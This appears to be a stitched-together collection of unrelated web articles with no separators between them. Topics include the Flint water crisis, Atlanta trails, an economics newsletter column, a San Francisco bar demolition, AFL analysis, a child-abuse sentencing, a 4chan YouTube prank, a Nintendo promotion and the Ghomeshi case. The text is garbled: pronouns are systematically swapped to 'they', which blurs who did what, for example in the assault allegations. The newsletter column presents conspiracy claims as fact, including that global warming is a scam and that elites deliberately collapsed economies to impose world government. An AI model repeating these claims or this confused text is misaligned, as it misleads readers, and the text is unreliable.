In 2014, officials implemented a cost-cutting plan to switch the city's water source from Lake Huron to the Flint River, which is 19 times more corrosive, according to researchers from Virginia Tech . That caused lead to leach from pipes and into the city's drinking water.
'Why is the water brown?'
Soon after the switch, the water started to look, smell and taste odd. Residents said it also looked dirty.
"The water would come in brown and my daughter was like 'Mom ... why is the water brown?,'" Flint resident Rhonda Keslo told CNN last year.
The EPA intervened in 2016, following studies that revealed dangerous levels of lead in the city's drinking water and a class-action lawsuit alleging that the Department of Environmental Quality wasn't treating the Flint River with an anti-corrosive agent.
The EPA enacted a Safe Drinking Water Emergency Order , which allowed it to more closely monitor and control the state and local response efforts in Flint. These efforts include rerouting the water supply, replacing corroded water pipes and distributing bottled water and filters.
The EPA's oversight requires that Weaver keeps the federal government abreast of developments in its plan to restore clean drinking water to the city. The federal agency has said it is still evaluating the water source alternatives and plan.
Lead levels below federal limit
The EPA has also required that the city receive public input on its final water source and treatment plan. The current proposed long-term water source is Lake Huron, according to Weaver's letter. But the city will announce its final decision in April. The city will also select a backup water source for use in emergencies.
Flint currently relies on water from Detroit's Great Lakes Water Authority. The city's agreement with Great Lakes Water Authority, which also draws its water from Lake Huron, is set to expire during this summer, according to documents filed with the EPA.
Since federal intervention, Flint's lead contamination has reportedly dropped. A six-month study by the Michigan Department of Environmental Quality revealed in January that lead levels in Flint's water supply had fallen below the federal limit . However, many residents still rely on bottled water, and the state still recommends that residents use filtered water for cooking and drinking.
Tallulah Gorge, Amicalola Falls, Cloudland Canyon: These Georgia hiking destinations are all gorgeous, challenging, and absolutely worth a visit. But they're also more than an hour's drive outside the city — and for some of us, that's enough of an excuse to flake on a hike. So while Midtown isn't exactly the first place you'd look for waterfalls and gorges, intown Atlanta does have a respectable number of trails and parks that are perfect for taking a walk in the woods. (In fact, there's even an entire book about them.) Here are a few places where you can get some fresh air without setting foot outside the Perimeter.
Dozens of species of birds, a champion tree, and a creepily fascinating folk art trail — all tucked in an unassuming corner of South DeKalb. The 125-acre brickyard-turned-wildlife preserve known as Constitution Lakes was purchased by DeKalb County a decade ago. The site now has a paved walkway and a parking lot, plus the second-tallest willow oak in Atlanta (and one very Seuss-sounding hybrid tree known as the Sweetwater Goak). Arborists aren't the only ones nerding out over this place though: Birdwatchers have spotted hawks, owls, kingfishes, and herons, among others. If you're not afraid of off-roading away from the paved walkway, the spectacularly creepy Doll's Head Trail is a fascinating walk lined with folk art crafted from washed-up trash.
This series of protected sites along the Chattahoochee River spans 48 miles, most of which are outside the Perimeter. But the CRNRA's most southerly points, the Palisades, are tucked just inside I-285, about a 20-minute drive from Downtown. If you're looking for a leisurely riverside stroll on a mostly-level paved path, stick to the West Palisades. Over on the other side of the ‘Hooch, the unpaved East Palisades meanders through dense woods, a bamboo forest, and along the river for more than 3.4 miles; it also includes a few steep climbs to 400-foot overlooks. Take a look at the guides over at AtlantaTrails or GeorgiaTrails for the play-by-play.
It's hard to say what's the most interesting part about this Southwest Atlanta gem: the rich Civil War history, the curious ruins, or the fact that there's an actual waterfall inside Atlanta's Perimeter. Either way, this quiet and verdant 120-acre greenspace is well worth spending some time exploring. Fun fact: according to Atlas Obscura, the site was once home to an exclusive resort where tourists could bathe in the healing waters of the Utoy Creek. Couldn't hurt to try.
Try to get anywhere near Irwin Street on a sunny Saturday afternoon, and you'll find incontrovertible evidence that the Beltline's Eastside Trail has been a huge hit with Atlantans. But what about the less polished legs of the 22-mile corridor? Known as the Interim Trails, these unfinished stretches aren't paved, nor are they lined with restaurants and bars (no yet, anyway). But these rough, bumpy trails are still worth exploring. Check out the Westside trail for a view of “Warehouse Row” and historic neighborhoods like Westview and Adair Park. (You can get an idea of the site with these before-and-after photos and renderings.)
By Bob Chapman - International Forecaster
The recognition of currency war, which has been going on for years, reflects the failure of international cooperation and the failure the G-20 to find a solution of the beggar-thy-neighbor policies of almost every nation. The result has been growing geopolitical dislocation, which G-20 has yet to find a solution for. These efforts, until recently, were turned upside down by the failure of the Copenhagen Summit in the summer of 2009, when it was discovered that global warming was a giant scam. This was proof positive that global leadership was nothing less than a group of common criminals. Economic and financial failure has brought about global austerity measures, and bickering over trade and currencies as well. As this transpired the economies of the US, UK and Europe slid downward in socio-economic, crisis, which in some cases has degenerated into violent demonstrations.
The US and UK are in economic paralysis due to the major changes anticipated in next week's elections of House and Senate delegates. The President isn't even going to be in Washington to witness the massacre of the Democrats. They just refuses to deal with it, as a long line of bureaucratic appointees head back to Harvard, foundations, think tanks, the Council on Foreign Relations and the Trilateral Commission. This as the Chairman of the Fed unveils plan two of quantitative easing, the creation of money and credit out of thin air, which in reality has been going on in the bond market since early June. Another bit of subterfuge dreamed up on Wall Street.
The Fed is monetizing a stimulus plan that the administration is no longer capable of assisting, due to an enraged public. On the other hand, large dollar holders are loudly complaining that the Fed's policies will cause major inflation and a falling US dollar. Of course, the flip side is if the Fed doesn't act in this manner the US economy will collapse and with it the world economy. The dumb Chinese, Japanese and oil producers should have long ago accumulated gold and gotten rid of dollars. That was not to be as they in fact enslaved to US leadership by yields and exports. The expenditure of $5 trillion over the next two years by the Fed will only take the US economy sideways at best, and in turn take the dollar to new lower levels. All the insiders know the plan won't work, but it will buy time, perhaps so they can have another war as a distraction, as they have done many times before in history. Even the public knows it won't work having been alerted by information pouring out of talk radio and the Internet. The US is already in austerity. Just look at real unemployment of 22-3/4%. This is getting worse not better and that means a change in control in the House and Senate could well bring about a constraining of fiscal and monetary policy.
The US is on a path to socio-political chaos as the dollar falls and the world monetary system comes unglued. Those countries in decent monetary and fiscal condition will pull away from dealing with the US and that has already occurred with Brazil that doesn't want inflationary dollar investments entering their country, thus, they have implemented a dollar investment tax. The US cannot return to the past. Its leadership lost that opportunity in June of 2003 when they decided to go ahead and take down the economies of the US, UK and Europe in order to force the inhabitants of these countries to accept world government. A main cog in this plan was the implementation of free trade, globalization, offshoring and outsourcing, which has cost the US in just ten years 8.5 million jobs.
There is no chance now of return as countries pull away from US and UK financial markets. These moves will protect these countries for a time, but eventually they will feel the sting of economic failure and instability as trade wars and tariffs become the norm. Washington will cease to be the world leader. The currency and trade wars have only just begun. They could not be avoided by either side. There is about to be a convergence of problems. Things that previously were not connected that will burst forth without warning. That will eventually lead to the implosion of the system.
These factors will be accompanied by social unrest, which we have just seen the beginnings of in Europe. This time of social, monetary and fiscal turmoil will last at least into 2014 before any solutions are put on the table. An easy solution is multilateral revaluation, devaluation and default. This would be very painful, but would stop the power by today's elites in the US, UK and Europe and the unmasking of their treachery.
Throughout Europe and the US there has and will continue to be a rise in patriotic movements, which those who control governments already have labeled terrorists. These are people like us who bring truth and exposure of facts to the attention of the public.
We are currently facing a new crisis in the US in the mortgage markets and in their securities, which has been aided and abetted by a disintegrating legal system. This comes to real estate at a time when it is on life support. The states cannot be of much assistance because most of them are broke, which is another distinct problem.
The US has already abdicated its role of world leader. Even leadership from Wall Street and banking is dreadful. Worse yet there is no one to take its place, as the world lies adrift in a sea of trouble. The atmosphere is explosive because no one wants to give up anything. The financial markets will all eventually fall and the flight to gold and silver as the only real money will gain acceptance, as we predicted long ago. Americans and others have failed to see the future and they'll pay dearly for not paying attention.
One of the interesting developments of the new currency wars is a concept that, the nations that will be the most successful, are the nations that devalue the fastest. One of the things nations miss is that the cheap currency that propels exports; also raises the costs of imports. Another fallout is others won't want to own your currency and if you devalue a currency enough it becomes worthless, or nearly so. A good example of that was in the 1930s where only tariffs were successful. As a rule those tariffs were not steep. The threat, of course, does that nations get mad at one another and war follows.
What these nations have been doing is similar to quantitative easing, or simple fiat creation of money and credit. These actions are the antithesis of sound money.
The Forex, foreign exchange market, trades $4 trillion a day and It's projected to trade $10 trillion daily in the next couple of years. Money flows are already wild to say the least. Many foreign currencies have been rising versus the dollar. Some nations such as Brazil have already instituted capital controls by putting taxes on foreign purchases of local sovereign debt. Those not into the foreign game are buying US Treasuries, gold, silver and commodities.
The FOMC and the Fed, even though they know it won't work, are becoming more and more accommodative. You will get some idea of their plan next week. The result will be a falling dollar, which is not really monetary policy, but grasping at straws in the wind. You will find nothing of sound money here and as a result markets will ultimately not survive. Remember, we could return to the circulation of gold and silver. 76 years ago gold coins were widely circulated and silver was in everyone's pocket just 47 years ago. It is not impossible. It could happen again over the next few years.
It was just two weeks ago that the dollar revisited 76.54 on the USDX. It had rallied over the past four months from 76.88. It is currently about 77.28. Every time it tries to rally it gets knocked down again. That is a long way from 89 where it was seven months ago. One thing is for sure, as long as we have ill-fated policies such as QE2 the dollar will continue to fall.
We also found it of interest that Bill Gross of PIMCO found the Fed has taken Charles Ponzi one-step further. They say, “Has there ever been a Ponzi scheme so brazen?” No, there has not, said Bill. When the Fed meets next Wednesday it could signify the end of a great 30-year bull market in bonds.
Fans of San Francisco's dive bars may have a new sorrow to drown: after almost 25 years in operation, Lucky 13 is set to be demolished and replaced with new housing.
According to the Planning Department, developers are seeking to demolish the bar and its patio to build a 28-unit, five-story apartment building with 2,900 square feet of ground-floor commercial space. Previous plans called for adding underground parking, but current blueprints specify only a basement space.
When we last reported about the proposed demolition almost two years ago, bar manager Martin Kraenkel said the wheels were in motion, but due to the building's historical significance, it would be “a year and a half before any decisions were made."
At the time, Kreankel said Lucky 13 is considered to be an historical resource, since it was one of 18 clubhouses built for Woodmen of the World, a fraternal society for woodworkers. An inscription on the bar's facade, ‘W.O.W 1906,' indicates the year the building was built and its former association.
The space also ties deeply into the city's LGBT history; in the 1970s, it was a popular dance club that went through several name changes, including Alfie's, The Mind Shaft, The Prism, 2140 Market, High Chaparral, The Corral, and The Industrial Dance Company. Supervisor Harvey Milk held meetings at the club, and part of their funeral was held there, said Kreankel.
Inscription in Lucky 13's facade. | Photo: Alisa Scerrato/Hoodline
The permit estimates that demolition and construction for 2140 Market St. will cost $3.9 million; there's no word yet on how long the work will take or which company will oversee the project.
Brian Spiers — who owns Lucky 13, but not the property it sits on — is also the owner and developer for the former Home restaurant site a few doors east at 2100 Market St., where their company is building a 60-unit residential unit building with two ground-floor retail spaces.
We've reached out to architect Warner Schmulz of Ankrom Moisan Architects as well as Spiers for a statement, but have not heard back. We will provide updates when we have them.
Thanks very much to tipster Livi L.!
Port Adelaide are keen to cause bounces, but awful at winning them
Usually a team with a dominant ruckman is somewhat keen to get them involved. With a dominant ruckman, a team can get first use of the ball and go back on the attack. So it stands to reason that the worst teams in terms of hitouts usually try to avoid the umpire's intervention.
Since Matthew Lobbe was dropped and subsequently injured, Port have been horrific in the ruck. Going from winning hitouts at roughly a league average rate with Lobbe, they are now the worst in the competition with respect to hitout ratio:
Dougal Howard, their first choice ruckman for the last two weeks, has been dropped this week, with part-timer Jackson Trengove leading a hodgepodge attack with Charlie Dixon and Justin Westhoff. So far this year those three have combined for 31 hitouts, or only eight more than Brisbane ruckman Stef Martin gets per game. One can only think that this will end badly if Port keeps tying up the ball.
Thing about Melbourne is, they always try and walk it in
As pointed out by several people during the week, Melbourne's scoring shot conversion rate/accuracy is off the charts this year. Right now they convert 66% of all scoring shots, which would be the highest conversion rate this millennium, and by a considerable margin. According to the Footy Live app (which is free, and we aren't affiliated with), they convert an extremely high number of goals from the goal square (hence the “walking it in”). Right now Fremantle have had 130 scoring shots (excluding rushed behinds), and Melbourne have had 129, yet Melbourne have scored 174 more points from those shots.
Melbourne have also shown the patience to pass up more borderline attempts at goal for chances that have a higher point return, even if they aren't a direct shot themselves. They are also lucky in the fact that their two KPFs are relatively accurate shots at goal from distance (Hogan and Watts, despite the opinions of a certain former Melbourne forward of the 90s) and a creative forward that can manufacture goals from almost anywhere (Garlett).
Melbourne are seemingly sacrificing shots for certainties, a strategy that almost always can't be upheld in the long run. It'll be interesting to see if they can manage to do so this year, and if it leads to success.
Let's talk about GWS
(Warning – This piece is long. Please skip if you don't care about GWS and/or are Eddie McGuire. TL;DR potential here. Don't say we didn't warn you. This is also Hot Take of the Week)
They deleted the tweet but Emma Quayle probably had the right of it here:
There's been two elements to the hysterical overreaction to GWS being quite good now:
They had too many startup concessions
Their ability to get (market rate first-refusal) access to players from the Riverina area of NSW will perpetuate that dominance forever
We don't think either of these are anywhere near the concern or injustice being claimed.
First, let's look at the startup concessions through the lens of the team GWS fielded in their demolition of Hawthorn. This is the 22 players they fielded, and how they were acquired:
Patton, Jonathon 2011 draft, pick 1 Coniglio, Stephen 2011 draft, pick 2 Buntine, Matt 2011 draft, pick 5 Haynes, Nick 2011 draft, pick 7 Greene, Toby 2011 draft, pick 11 Cameron, Jeremy 2011 Prelisted 17 year old Shiel, Dylan 2011 Prelisted 17 year old Wilson, Nathan 2011 Prelisted 17 year old Kennedy, Adam Preselected in 2011 (had previously nominated and gone undrafted) Davis, Phil 2011 Uncontracted player signing Palmer, Rhys 2011 Uncontracted player signing Scully, Tom 2011 Uncontracted player signing Ward, Callan 2011 Uncontracted player signing Williams, Zac 2012 zone pick from Riverina (before zone picks gave away to Academy bidding) Whitfield, Lachie 2012 draft, pick 1 (earned by sucking) Kelly, Josh 2013 draft, pick 2 (obtained via Tyson trade who was Pick 3 in 2011) Lobb, Rory 2013 draft, pick 29 (acquired via pick shuffling in Polec trade) Steele, Jack 2014 draft, pick 24 (GWS Academy, from Canberra) Johnson, Steve Traded for nothing (de facto DFA) Patfull, Joel Traded for pick 21 (which was originally the Brennan compo pick to GC and changed hands several times) Mumford, Shane Traded for pick 35 Shaw, Heath Traded for Taylor Adams (who was pick 13, 2011 draft)
GWS only have 17 first round picks that they drafted on their list. One of those is Cam McCarthy, who looks unlikely to play for GWS again at this point in time.
The bolded players, 14 of 22, were acquired during GWS' extremely astute use of nearly the same concessions entry year Gold Coast also got:
Picks 1,2,3, 5, 7, 9, 11, 13, and 15 in their first draft.
The ability to pull 17 year olds born in January-April out of this same draft pool a year earlier.
The ability to sign uncontracted players
The ability to sign or trade draft prospects who had previously nominated and gone undrafted
Zone picks from the NT and the Giants' share of NSW
Unlike Gold Coast, GWS had mini draft picks to trade (O'Meara and Crouch) which netted them picks 4 and 10 as well
These were all very useful concessions, but the key thing to note is that for GWS to nail most of their draft picks was a massive win for them. They left Wingard, Longer and Docherty on the table among the early picks and two of those guys have since been traded for less than what they were drafted with. GWS also turned their high profile departures into wins (Tyson became Kelly, Adams became Heath Shaw, Boyd became Griffen).
GWS also certainly were lucky that the whole first round looks like it was a strong draft at this stage (especially considering that Treloar, Cameron, Shiel and Wilson were also in this pool). The first true miss might be Josh Bootsma at pick 22.
Cameron and Shiel also turned out better than any of Gold Coast's prelist 17-year-olds (Matera, McKenzie, Nicholls) although the Suns made better use of their zone to produce Thompson and several tall players who are now at other clubs (Dixon, Hickey and Smith)
In addition, getting their uncontracted player signings (Ward, Davis, Palmer, Scully) right really sets them apart from the Suns as soon as we remember that Campbell Brown was arrested for assaulting teammates and/or drunkenly disgracing themselves in three different countries.
To sum up, GWS assembled the core of their team in year one, managed their exiting players very well and have also supplemented themselves very effectively with subsequent general draft picks and signing of older players from other clubs.
They used their entry concessions extremely well but we also question whether the level of concession is excessive for a startup side. It's certainly not unprecedented. Consider that West Coast and Adelaide had untrammelled access to an entire state's talent in an era when the draft was a crapshoot and Victoria's metropolitan area was still zoned. Such access netted the expansion sides four out of ten flags in the 1990s and has to be considered fairly generous in its own right. Port Adelaide also won a flag with heavy influence by players acquired from their entry concessions.
And as for the academy
GWS get access, via their Academy development program, to first-refusal rights to players from a productive football area called the Riverina, but actually encompassing areas usually referred to separately as Murray and Riverina. Maps vary but we're talking about roughly the two areas of Murray and Riverina depicted here:
It's mostly a core AFL area, although Wagga Wagga and north and east of there are pretty mixed or starting to become Rugby League predominant. There's maybe 250,000 people in the entire region, so it's half the size of Tasmania, and it has produced a steady trickle of talent over the years including the Danihers, Wayne Carey, Paul Kelly, Dennis Carroll, John Longmire, Leo Barry, Shane Crawford, Brett Kirk, and Sam Rowe.
People are probably right to be concerned about the level of talent being accessed here but we want to emphasise something that's been lost in the debate – the opportunity cost of obtaining this talent in a draft system, and how GWS' ability to exploit this year's talent is directly linked to how well they used their startup decisions to stockpile surplus talent.
GWS' successful drafting and recruiting has left them such a surplus of talent that that they were never going to keep it all. As such, GWS have been steadily dispensing it back to the rest of the league. They've been conducting what we called in 2014 a “fire sale” to convert that stockpile into useful goods. They've been trading many players less than fair value, and there are now an entire team worth of former Giants at other clubs. It'll keep happening too, as we note that even whingers-in-chief Collingwood are openly discussing who they can get. This is right and natural.
The rationale is simple – as much as GWS started with, they can't put more than 22 players on the park at one time, they can only pay so many players highly under a salary cap, there's only 4400 games a year to play at a club.
This year there is by all reports a huge glut of players available to GWS through their academy from the Riverina area. Some are claiming there's five top-30 calibre picks there at this early stage.
But under the academy bidding system, GWS have to pay for all the players they acquire, by matching bids and paying market value on a points system the AFL and clubs have backed as sound. It won't be cheap, they'll have to match whatever any other club is willing to pay for players and given the level of complaining, we assume these clubs have a strong interest in these players.
What it does mean is GWS are playing a different list management game to everyone else right now – they've got an unparallelled stockpile of talent they can't retain or use, and an unparallelled stockpile of talent in the academy portion of the draft this year who they want to bring in for the future.
If they're going to bring in five blokes, they need to shed others from their list. They've already done the preparation work for this in 2015 – trading out Treloar, Hampton, Lamb, Sumner, Phillips and Plowman and getting back Collingwood and Geelong's first round picks and Adelaide's second. By our reckoning they'll need to do more trading or delisting this year to make the space on their list for the players they want, and in terms of points, if clubs genuinely rate players highly and bid for them, then the Giants will likely either need to let kids go or maybe go into points deficit in the 2017 draft.
What GWS are going to do is to launder a lot of their startup material into this glut of academy products this year. They've been preparing since last year. But the level of currency they currently have to pay for these players is a onetime bonanza. In future, even if GWS keep this zone, even if it produces another glut year, they simply won't be able to afford to take as much as they can now.
Even this year, if it's true there's ten National Draft level prospects (which would be either a big outlier or such a boom as to suggest the academy is adding to the draft pool like it's supposed to), they'll leave very good players on the table. And in future they won't have the Treloars and the Plowmen and the Tomlinsons and the McCarthys just sitting there to be swapped for the picks needed to pay for new players.
Our point here isn't to suggest that the system is necessary or equitable. There seems to be no obvious need for talent development in this region, and accessing players who are boarding in Victoria seems contrary to that aim as well. GWS have already lost access to one guy for being insufficiently linked to their academy.
What we do want to stress is that GWS are still trading on their startup talent, and that's a self-limiting commodity. The academy helps them to use this stockpile better by converting it to younger players, but that's it.
In future, even assuming the zone is kept with better rules around kids boarding in Victoria and the like, GWS will have to pay much more to meet market value for very good Academy kids. They'll have tough decisions and tradeoffs like everyone else.
Advertisements
A 39-year-old woman has been jailed for four years after being found guilty of 29 charges of neglect, assault and ill-treatment of their children.
Imposing sentence at Galway Circuit Criminal Court this afternoon, Judge Karen O'Connor said the abuse would have a lasting effect on the children.
During a nine-day trial last January, six of the woman's children gave evidence of the treatment they had been subjected to over a five-year period.
The assault, neglect and ill-treatment happened at various locations in the west of Ireland between 2006 and 2011.
The woman, who cannot be named to safeguard the identity of their children, had denied more than 40 charges. A jury returned unanimous guilty verdicts in respect of 29 of these.
As they reviewed the evidence given in relation to each of the charges this afternoon, Judge O'Connor pointed out how some of the children were as young as two when some of the assaults took place.
Judge O'Connor detailed how one child was pushed down the stairs by their mother.
On another occasion, the woman drove a car at two of their children after they had spilled a milkshake on the way home from a birthday party. Others were made to swallow washing up liquid and another had their head held underwater.
Imposing sentence, the Judge spoke of the lasting impact the treatment would have. They noted the breach of trust that had taken place, saying it was difficult to be as vulnerable as a young child.
They spoke of an atmosphere that left the children "frightened, anxious and helpless" and said the cruelty perpetrated on them had a "profound effect".
Judge O'Connor said the pain of separation was significant for all the victims. They referred to the fact that there was a recurring theme of sadness that their family had been broken up.
They said it was the Court's view that the cumulative effect of the neglect was more damaging than the specific assaults.
Judge O'Connor imposed concurrent sentences ranging from 18 months to five years in respect of each of the 29 charges, allowing for mitigating factors and suspending the final six months.
The charges arose from an investigation after social workers made an unannounced visit to a house where they found infant children in the care of their young siblings, with two intoxicated and unrelated men also in the house.
The children were subsequently taken into care and details of the treatment they had been subjected to began to emerge.
During the trial the children told how there was a continual absence of food for them to eat; how they were constantly subjected to adults excessively consuming alcohol in the family home; how their clothing was regularly dirty and how they were often left unsupervised.
In all cases they outlined incidents of physical violence against them or their siblings.
The children's mother admitted administering corporal punishment when questioned by gardaí. They said they were not being violent and instead claimed they were disciplining them children.
The effect the treatment had on the seven children was detailed in psychologist reports and victim impact statements that were presented in court last week.
Several of the children told how their lives had improved since they had been taken into care. They outlined how their experiences had left them anxious, afraid and intimidated.
The children expressed sadness that they did not see their siblings as much as possible and reports stated the legacy of the adverse care would remain with them well into the future.
The woman's co-accused was a former partner of hers. At the start of their trial last December they pleaded guilty to five charges.
In court last week, the 48-year-old apologised for their actions. They said not a day went by when they did not regret what they had done.
Today they were given a two-year suspended sentence.
Judge O'Connor noted their plea, their expression of remorse and the manner in which they were trying to rehabilitate relationships with their own children.
YouTube Suspends Kid's Account, Gets Porn Fest In Protest
Enlarge this image toggle caption Kr4zyS3xy/Youtube Kr4zyS3xy/Youtube
Happy YouTube Porn Day! Did you get my card?
Let me explain. Thanks to the members of the online community 4chan — regarded either as merry pranksters or trolls depending on your perspective — YouTube woke up this morning to newly uploaded videos that intersperse innocuous footage with images that are most decidedly NSFW.
But 4chan's declaration of YouTube Porn Day isn't a mere prank. It's much more personal than that — it's revenge. And it's all because of a kid called Lukeywes1234.
Known in real life as Luke Taylor, Lukeywes1234 is a typical eight-year-old boy who likes Super Mario Bros and Harry Potter. They created a YouTube channel to talk about their interests, as well as do fun things around the house. They had a handful of YouTube subscribers and probably thought it would always remain that way. In this video they pretend to hunt down some ghosts.
In recent days, members of 4chan began encouraging each other to subscribe to their channel and comment on their videos. Suddenly, Lukeywes1234 found themselves with hundreds, then thousands of new subscribers offering a surprising amount of positive encouragement. Practically overnight, it seemed like they were turning from just another anonymous kid to the next big meme.
Then YouTube pulled the plug.
Remember when I mentioned they were eight years old? Well, that's five years below YouTube's minimum age requirement. When you try to find the original videos from their channel, you're greeted with a message saying their account was suspended for violating the site's terms of service. From a site management perspective, it was a perfectly logical thing for YouTube to do give their young age, but it was tantamount to throw the gauntlet at 4chan.
Now 4chan is exacting its revenge. They've encouraged their members to upload videos containing a blend of both innocent and adult footage, with the video set to private, so no one could see it initially. Then once today came around, they would switch the videos to public, leaving Youtube scrambling to remove the videos before unsuspecting users looking for cat videos and whatnot found themselves accidentally watching fetishes that couldn't even be described on NPR without the FCC blowing a gasket.
Though Lukeywes1234's account is no more, their legend lives on. At last count, there were more than 250 tribute videos dedicated to him, many of which utilize footage from their original videos, like this one:
I spoke with YouTube spokesperson Scott Rubin this afternoon. They said YouTube first heard of 4chan's activities via blog coverage in the last 24 hours, but they didn't feel the need to prepare any special defense for it.
"For the most part, it's another day in the life of us," they said, noting that YouTube receives 20 hours of new video per minute, requiring a large system of community flagging and YouTube staff reviewing content to begin with.
Rubin said this is also not the first time the folks at 4chan have tried something like this.
"Our system is really rigorous," they said, "and we're prepared to keep the site safe all the time."
Share:
StreetPass Update Weekend
New games and features have arrived on the StreetPass™ Mii Plaza™ application—so we're celebrating with a StreetPass Update Weekend! Now through 11:59 p.m. PT on 9/5, bring your Nintendo 3DS™ family system to a hotspot near you to collect StreetPass tags.
Your new StreetPass tags will come in handy for the latest games. You can download either Slot Car Rivals or Market Crashers for FREE, with more games available for purchase. To make sure you get the update, go into the StreetPass Mii Plaza app on your Nintendo 3DS system and navigate to “Check for Updates” and update to the newest version of StreetPass to get new games and content. For more information on all the games, visit this page.
The StreetPass Mii Plaza Miiverse community is also now available, so you can share screenshots or get tips about the new StreetPass games in the community!
This update also lets you store 100 Mii™ characters at the Plaza Gate with the purchase of Mii Plaza™ premium content, so be sure to bring your system along if you're going to PAX West!
You can also use those StreetPass tags in tons of other games, including:
Style Savvy™: Fashion Forward: Swap showrooms with other players and see their characters show up in your store via StreetPass.
Pokémon Omega Ruby and Pokémon Alpha Sapphire: You can make your own Secret Base and share it with others using StreetPass.
Pokémon Omega Ruby, Pokémon Alpha Sapphire, Pokémon X, or Pokémon Y: Don't forget, you can receive Victini via the Nintendo Network from September 1 to 24, 2016. Be victorious with Victini! For more details, click here.
Monster Hunter Generations: Collect tickets via StreetPass to access special Deviant monster quests. Players can also send and receive customizable guild cards. Plus, you can get a new pack of DLC for FREE on Sept. 2. Highlights for this month include Star Fox outfits for your Felynes and hunter gear modeled after Capcom's cyber ninja Strider Hiryu! To access the DLC, just head to the in‐game DLC menu and download the content listed for this month.
Shovel Knight: Enter the StreetPass Battle Arena where players can use recorded versions of their Shovel Knight to face off against rival opponents.
Story of Seasons : Once you've activated StreetPass, you'll be able to meet all kinds of new people! When you pass by other Nintendo 3DS systems that have StreetPass enabled for this game, you'll automatically exchange profiles, and they may show up to visit your town or Trade Depot at NPCs.
Find a Nintendo Zone hotspot near you here: http://www.nintendo.com/3ds/nintendozone. For questions about StreetPass events, check out the Support FAQ.
StreetPass Mii Plaza game rated:
Mild Fantasy Violence
© 2016 Nintendo. StreetPass Mii Plaza and Nintendo 3DS are trademarks of Nintendo.
The woman at the centre of the sexual assault charge that is expected to be dropped against Jian Ghomeshi Wednesday once cheerfully agreed with an interviewer that while they were working on the radio show Ghomeshi used to host they were “incredibly inappropriate, foul-mouthed and sexual” in the workplace.
The 41-minute interview took place with journalist Jesse Brown on their Canadaland podcast on Dec. 9, 2013, a year before the woman went fully public with their allegation, though in that story they acknowledged having been an earlier anonymous source for Brown.
The interview remains posted on the Canadaland website, where it was first publicized last month by YouTube vlogger Diana Davison.
[np_storybar title=”Live updates from Ghomeshi's court appearance on Wednesday morning” link=”http://news.nationalpost.com/news/canada/jian-ghomeshi-peace-bond#codeword”%5D
[/np_storybar]
Ironically, the woman's name is now protected by a court-imposed publication ban.
The interview with Brown, a good friend of the woman and co-author of the original Toronto Star story on the allegations that Ghomeshi was physically violent to their partners, is important because it may suggest why prosecutors are expected to withdraw the single charge once the 48-year-old former CBC star signs a peace bond at the Old City Hall courts in downtown Toronto.
In other words, this complainant, like the three who went before them in March at Ghomeshi's first trial, may be vulnerable to questions about their credibility.
The first group of three women — among them Trailer Park actor and air force captain Lucy DeCoutere and Linda Redgrave, who only recently had the ban on their identity lifted — were wholly discredited when they failed to disclose the length and breadth of their contact with Ghomeshi and made critical last-minute disclosures to prosecutors.
As a direct result, the judge found they were unreliable witnesses and acquitted Ghomeshi of four counts of sexual assault and one of choking with intent to overcome resistance to sex assault.
All three had casually dated the former Q host and claimed, publicly and in the witness stand, that once they purportedly assaulted them, the casual relationships with them swiftly ended.
But as emerged in cross-examination by Ghomeshi's lead lawyer, Marie Henein, that wasn't true.
After their alleged assaults, DeCoutere pursued Ghomeshi by email, sent them a hand-written love letter and once told them in no uncertain terms they wanted to have sex with him, while Redgrave sent them a come-hither picture of themselves in a bikini and the third complainant admitted having given them a consensual hand job after a night out.
In the current case, Ghomeshi is alleged to have sexually assaulted the woman on Feb. 7, 2008, at the CBC, where the two then worked.
The assault reportedly involved them grinding their pelvis into their rear.
But the 36-year-old woman, who now lives out of the country, revealed themselves in the Canadaland interview not only as an articulate and ambitious talent but also as a sometimes-profane outlier at the staid CBC.
They told Brown that “I definitely got rapped on the knuckles for my behaviour” at the broadcaster for such things as “making a terrible fist-f—ing joke in the middle of a story meeting” and said they often felt they were walking “a tightrope.”
When Brown remembered how “tone-deaf” they had been to CBC politics, they agreed: “The feedback I was getting was that I was tone-deaf to office politics.”
And when they told them they were so much a fish out of water at the CBC — “incredibly inappropriate, foul-mouthed and sexual and culturally out of step” — that their behaviour would have got anyone else fired, they said they were just 23 and “making it up as I go along.”
Despite their public statements in December of 2014 that Ghomeshi's constant sexually aggressive conduct had not only driven them to binge-drinking, overeating and depression, she, Brown and their boyfriend (who was part of the interview) discussed at length their copious wine-drinking, “manic” behaviour and outsized appetites.
“I wanted enough money for my appetites,” they told Brown once, “and my appetites have always been great. That's it.”
The bizarre interview — the three were audibly chowing down on a pizza throughout the first half of it — presented a radically different picture of the woman than the one they painted when they outed themselves as an alleged victim and described Ghomeshi as “one disgusting man.”
As the YouTube vlogger Davison remarked, the interview suggests the CBC environment was “proper and dry” and that it was the woman “who brought inappropriate sexual conduct into the office.”
As Postmedia first reported, it's anticipated that at court Wednesday, Ghomeshi will agree to a peace bond — often used in cases where misconduct doesn't meet the criminal standard — and that prosecutor Mike Callaghan will then formally withdraw the charge.
The peace bond could impose specific conditions upon the former CBC host, but generally, it requires that someone “keep the peace and be of good behaviour,” usually for a year.
• Email: cblatchford@postmedia.com | Twitter: blatchkiki
Wanted to Love it
Would you say that listening to this book was time well-spent? Why or why not?
I was somewhat disappointed with this selection. I think I may have had too high an expectation. Emma Thompson, Gothic story, Henry James how could it not be fantastic? Something was just not quite right, still not sure what
Would you recommend The Turn of the Screw to your friends? Why or why not?
No, probably not. It was not very compelling. I listen to a lot of audiobooks and one of my standards is how well it holds my attention and I had to actively listen for this one to keep me engaged.
Did the narration match the pace of the story?
I think Emma Thompson's narration was an interpretation and unfortunately it missed the mark. At times it was too breathy and frantic, if trying to convey a sense of urgency the story should have conveyed without this added affectation. Other times it bordered on the pedantic, which is a shame because prior to this I would have thought I would have enjoyed Emma Thompson reading the phone book.
Could you see The Turn of the Screw being made into a movie or a TV series? Who should the stars be?
In the right hands it could be however this story is very much a psychological journey. Are the events of the story really happening or is this the overwrought imagination of an impressionable young woman?
Any additional comments?
I have found the narration of famous actors and actores to be somewhat uneven. This would be an example of a miss, Kate Winslett and Mathilda would be an out of the park homerun. I really think I prefer the work of narrators who primarily do voice work, they enhance the story, the written word without eclipsing it.
23 of 27 people found this review helpful
Coming Soon
The Panama Papers
The true story of two journalists whose work set off an international firestorm by revealing how easily the wealthy hid billions of dollars offshore.
Paskal
Naval unit PASKAL is among the most elite special forces in Malaysia. But all bets are off when one of its own stages a hijacking. Based on true events.
The Last Summer
